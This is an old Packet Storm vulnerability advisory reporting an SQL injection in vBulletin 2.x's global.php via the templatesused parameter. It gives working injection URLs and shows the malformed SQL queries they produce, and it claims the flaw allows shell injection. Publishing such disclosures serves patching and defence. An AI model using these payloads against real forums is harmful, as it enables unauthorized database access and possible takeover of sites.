Vbulletin-2.x.txt

2006-10-03T00:00:00
ID PACKETSTORM:50512
Type packetstorm
Reporter HACKERS PAL
Modified 2006-10-03T00:00:00

Description

                                        
                                            `Hello,,  
  
Vbulletin 2.X sql injection  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : security@soqor.net  
  
This is sql injection in vbulletin systems  
  
the injection is in the global.php file  
  
we can use it   
  
global.php?templatesused=))/*  
  
the query will be   
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid  
  
global.php?templatesused=nn,dd,'))/*  
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid  
  
It Can be used as shell injection  
  
Tested on VB 2.3.X and other versions are injected ..(2.X)  
  
#WwW.SoQoR.NeT  
`